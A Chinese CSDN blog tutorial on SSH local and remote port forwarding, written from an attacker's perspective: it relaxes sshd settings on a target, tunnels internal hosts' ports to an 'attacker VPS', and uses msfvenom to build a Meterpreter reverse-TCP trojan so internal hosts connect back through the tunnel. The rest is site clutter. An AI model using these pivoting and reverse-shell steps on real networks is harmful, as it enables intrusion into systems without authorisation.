连接本地端口_SSH隧道端口转发详解

最新推荐文章于 2024-03-30 11:43:33 发布
最新推荐文章于 2024-03-30 11:43:33 发布
阅读量308 收藏
点赞数
文章标签: 连接本地端口
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_29752563/article/details/112711339
版权
本文详细介绍了SSH的端口转发,包括本地端口转发和远程端口转发,以及如何通过SSH隧道实现内网主机上线。通过不同场景的模拟,展示了如何在各种限制条件下利用SSH进行安全的数据传输和访问控制。
摘要由CSDN通过智能技术生成

一、SSH配置文件设置

需要在目标主机修改如下配置文件内容:

Vi /etc/ssh/sshd_config   #SSH配置文件AllowTcpForwarding yes     #是否允许转发TCP协议GatewayPorts yes   #是否允许远程主机连接本地转发端口PermitRootLogin yes    #是否允许root登录PasswordAuthentication yes    #是否允许使用基于密码的认证TCPKeepAlive yes    #保持心跳,防止 ssh 断开

二、SSH端口转发参数详解

-C   #压缩传输,加快传输速度-f    #将SSH转入后台执行,不占用当前的shell-N   #建立静默连接(建立了连接,但是看不到具体会话)-g   #允许远程主机连接到本地用于转发的端口-L   #本地端口转发-R   #远程端口转发-D  #动态转发(socks代理)-P  #指定SSH端口

三、具体转发方式

①本地端口转发(将攻击者vps的某个端口转发到目标指定机器的指定端口)

场景:只能访问B主机,B作为跳板,将内网C主机端口带出来

在vps上执行:

ssh -L vps本地端口:C主机ip:C端口 B用户名@ip

实例:

ssh -CfNg –L 2121:192.168.1.109:3389 root@192.168.1.2

671a641e79beda4ef707d2be51abca1f.png

此时连接vps本地2121端口就相当于连接到内网C主机的3389端口

1e659d122f6dd5e479fb6771c7475d54.png

②远程端口转发(将目标主机的某个端口转发到攻击者vps的指定端口)

场景:无法访问B主机,但是B主机可以出网,通过B为跳板,将内网C主机端口带出来

在B跳板上执行:

ssh -R vps端口:C主机ip:C端口 vps用户名@ip

实例:

ssh -CfNg -R 1080:192.168.1.109:3389 root@192.168.1.106

1bba35d7a89a5a1ea1c49e8a66ed730d.png

此时连接vps本地1080端口就相当于连接到内网C主机的3389端口

-b5c8b174a458e61659e91310f0c08d35.png

四、如何通过跳板机让内网主机上线?

①通过本地端口转发

场景:(B跳板机能出网,内网C主机能访问B跳板,内网其他主机怎么全部上线呢?)

C主机执行:

ssh -CfNg -L 本地端口:vps的ip:vps端口 B用户名@ip

4edd4537a179a85bfa9be35812e8a5ba.png

然后MSF生成木马(lhost=C主机ip,lport=C主机端口):

msfvenom -p windows/meterpreter/reverse_tcp lhost=C主机ip lport=C主机端口 -f exe > ssh.exe

d7c6d5d5ec103728eedb187076130691.png

然后vps开启MSF监听(vps本地端口和ip即可):

b13b95b6283129cacf7460ab460e6bdb.png

内网中的主机执行payload就能成功上线:

流量走向:C主机6666端口-->B跳板-->vps的6666端口

ff257e8ab1e80d317bae212c87f282a4.png

②通过远程端口转发

场景:(B跳板机能出网,内网C主机能访问B跳板,内网其他主机怎么全部上线呢?)

B跳板执行:

ssh –CfNg -R C主机端口:vps的ip:vps的端口 C主机用户名@ip

1172636f60f59e626c7455167adad919.png

然后MSF生成木马(lhost=C主机ip,lport=C主机端口):

8eb247cb3158fd226ff4d39a10386a87.png

然后vps开启MSF监听(vps本地端口和ip即可):

171fb66a1010f7c5c57d2ebe0edc71e5.png

执行payload就能成功上线

流量走向:C主机7777端口-->B跳板-->vps的4444端口

4184006d7de1672fef71e04fa96772fc.png

文章只是模拟部分场景,总体来说SSH隧道还是挺稳定的,实际场景还需根据实际情况进行思路拓展,文章如有错误,欢迎一起交流

爱吃螺蛳粉的妞儿
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[精]详解SSH端口转发,本地端口转发、远程端口转发、动态端口转发
苏南生的CSDN博客
03-19 1万+
通过本文的介绍,读者可以从中了解到如何应用 SSH 端口转发机制来解决日常工作 / 生活中的一些问题。学会在非安全环境下使用端口转发来加密网络应用,保护个人隐私以及重要商业信息。同时也能够用此技术解决工作中一些常见问题,例如解决防火墙及网络应用本身带来的一些限制。
修改ssh端口
03-12
适合于CentOS和RHEL,下载后给其权限,运行就可以一键改变ssh端口
ssh 指定端口_SSH隧道端口转发详解
weixin_39816141的博客
12-09 951
一、SSH配置文件设置需要在目标主机修改如下配置文件内容:Vi /etc/ssh/sshd_config #SSH配置文件AllowTcpForwarding yes #是否允许转发TCP协议GatewayPorts yes #是否允许远程主机连接本地转发端口PermitRootLogin yes #是否允许root登录PasswordAuthentication ...
SSH连接中指定端口号,可以通过在SSH命令中使用“-p“参数来指定端口
最新发布
BLOG域名:programb.blog.csdn.net
03-30 2612
这将显示出所有正在监听的TCP和UDP端口,并过滤出包含"ssh"关键字的行,从而找到正在监听的SSH连接端口号。在SSH连接中指定端口号,可以通过在SSH命令中使用"-p"参数来指定端口号。其中,"username"是你的用户名,"hostname"是你要连接的主机名或IP地址。请注意,如果你更改了SSH服务器的默认端口号,你需要确保在连接时使用正确的端口号。文件中查找包含"Port"关键字的行,并显示出当前配置的SSH连接端口号。在Linux系统中,有多种方法可以查看正在监听的端口号,比如使用。
linux ssh自定义端口
学亮编程手记
02-25 768
在使用SSH(Secure Shell)连接远程服务器时,如果目标服务器的SSH服务运行在非默认端口上(默认端口号是22),你需要在命令行中明确指定所使用的端口号。这样,SSH客户端就会尝试通过1234端口与远程服务器建立安全的加密连接。例如,如果你需要通过端口号1234连接到远程服务器,用户名为。选项,然后跟上要连接端口号。
ssh端口登录
热门推荐
IChen.的博客
03-29 1万+
ssh -p 端口号 root@ip
SSH端口转发,本地端口转发,远程端口转发,动态端口转发详解
01-10
第一部分 SSH端口转发概述 当你在咖啡馆享受免费 WiFi 的时候,有没有想到可能有人正在窃取你的密码及隐私信息?当你发现实验室的防火墙阻止了你的网络应用端口,是不是有苦难言?来看看 SSH端口转发功能能给...
SSH远程登录和端口转发详解
01-20
SSH 协议默认端口是22,指定端口可使用 -p 参数 $ ssh -p 2222 user@host MITM SSH 采用公钥加密的方式来保证传输安全。过程如下: 客户端发起登录请求,远程主机将自己的公钥发个用户; 客户端使用该公钥将登录...
SSH端口转发之本地转发
weixin_34261739的博客
06-20 268
一、案例环境: 3台RHEL6.5 64虚拟机(分别为:HostA、HostB、HostC) IP地址: HostA:192.168.100.101 HostB:192.168.100.102 HostC:192.168.100.103 角色: 外网主机:HostA 内网堡垒机:HostB 内网服务器:HostC 二、需求: 前提条件:HostB:开启ssh远程访问,Host...
ssh 指定端口_ssh反向代理
weixin_39980575的博客
12-09 448
一些服务器只能登录上网,因网络安全没有 port 访问进去,通常大家想到的是QQ远程协助之类的,实际上能上网就能做一切。SSH反向代理即可搞定一切, ssh先登录到远程服务器上,并登录时配置好反向代理,这样即可通过反向代理从远程机访问回机器。正向代理大家可能使用得挺多:ssh -fCNL ,就不用多说了。反向代理:ssh-fCNR[B机器IP或省略]:[B机器端口]:[A机器的IP]:[A机器端...
ssh时怎么同时指定其端口号,以及scp文件到远程的指定端口
qq_40467670的博客
12-14 3261
如果我要将本地文件 /path/to/local/file.txt 复制到远程主机 example.com 的 /path/to/remote/ 路径下,并使用自定义的端口号 12345,我该怎么做?如果想要通过 SSH 连接到指定端口的远程服务器,可以在 SSH 命令中使用 -p 或 --port 参数来指定端口号。在执行命令时,系统会要求输入远程主机的密码(如果使用密码进行身份验证)。其中, 是要连接端口号,user 是远程服务器上的用户名,host 是远程服务器的地址或 IP。
ssh 远程登陆指定端口
IChen.的博客
10-14 9923
ssh 到指定端口 ssh -p xxx user@ip xxx --为 端口号 user --为用户名 ip --为要登陆的ip
centos8 ssh配置_如何建立一个足够安全的SSH连接
weixin_39977642的博客
11-26 623
1 概述 使用SSH连接服务器是一件很平常的事,但是,连接是否足够安全是一个令人担忧的问题。本文从如下几个方面介绍了如何建立一个足够安全的SSH连接端口协议用户密码密钥对ssh-agent2 端口第一步就是修改默认端口22,修改/etc/ssh/sshd_config中的Port即可,比如这里修改为1234端口:1234注意这里需要配合SELinu添加端口,否则不能启动sshd服务,在CentO...
ssh远程到主机指定端口
sinat_34863938的博客
01-27 1万+
mac工具:自带终端、iterm2、SecureCRT windows工具:xshell或其他shell工具 第一种情况(没做端口映射): 命令:ssh 用户名@主机ip 端口号 例子:比如要远程到主机22.22.22.22的12345端口,命令为 ssh root@22.22.22.22 12345 第二种情况(做了端口映射): 命令:ssh 用户名@主机ip -p 映射的端口号 例子:比如要远程到主机22.22.22.22的12345端口,但是12345端口被映射到了54321端口,所以要访问12345
ssh连接命令的指定端口位置的影响
weixin_45504248的博客
05-23 619
一共四条ssh连接命令,第2、3条把 -p 放在地址后面,第2条出错了,其余均正常。总结:有些情况需要把端口指定放在地址前才生效,可以当成习惯。ps:第二条是我连接termux的opensshssh连接命令的指定端口位置影响。
ssh使用指定端口登陆服务器
wo_CEO的博客
09-21 1150
ssh 用户名@ip 端口 例如 ssh root@10.0.1.1 1022
ssh中添加隧道,访问目标机器上的地址
涂作权的博客
04-23 397
网络结构如下: 注意:下面的跳板机可以通过curl -lv http://targetIp:port 访问到页面。 配置案例: 接着在本地的浏览器上输入:http://localhost:20000/,可以看到: 说明该配置成功了。
SSH命令
AF黑眼圈患者的博客
03-27 3811
如果你的客户端有多于两个以上的 IP 地址,你就不可能分得清楚在使用哪一个 IP 连接SSH 服务器。为了解决这种情况,我们可以使用 -b 选项来指定一个IP 地址。SSH 提供的 -v 选项参数正是为此而设的。使用 ssh-keygen -t +算法 ,现在大多数都使用rsa或者dsa算法。使用 -C 选项,所有通过 SSH 发送或接收的数据将会被压缩,并且任然是加密的。SSH 默认连接到目标主机的 22 端口上,可以使用-p选项指定端口号。使用ssh的-X选项,然后主机就会开启 X11 转发功能。
玩转SSH端口转发
weixin_33827965的博客
04-24 389
SSH有三种端口转发模式,本地端口转发(Local Port Forwarding),远程端口转发(Local Port Forwarding)以及动态端口转发(Dynamic Port Forwarding)。对于本地/远程端口转发,两者的方向恰好相反。动态端口转发则可以用于科学上网。 SSH端口转发也被称...
Simics中加载光盘与SSH端口转发详解
本文主要介绍了在Simics虚拟环境中进行Solaris SPARC操作系统的安装、配置和管理过程。首先,作者详细描述了如何通过`new-file-cdrom`命令加载光盘,如`my.iso`,并在虚拟机的/cdrom目录下访问它。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值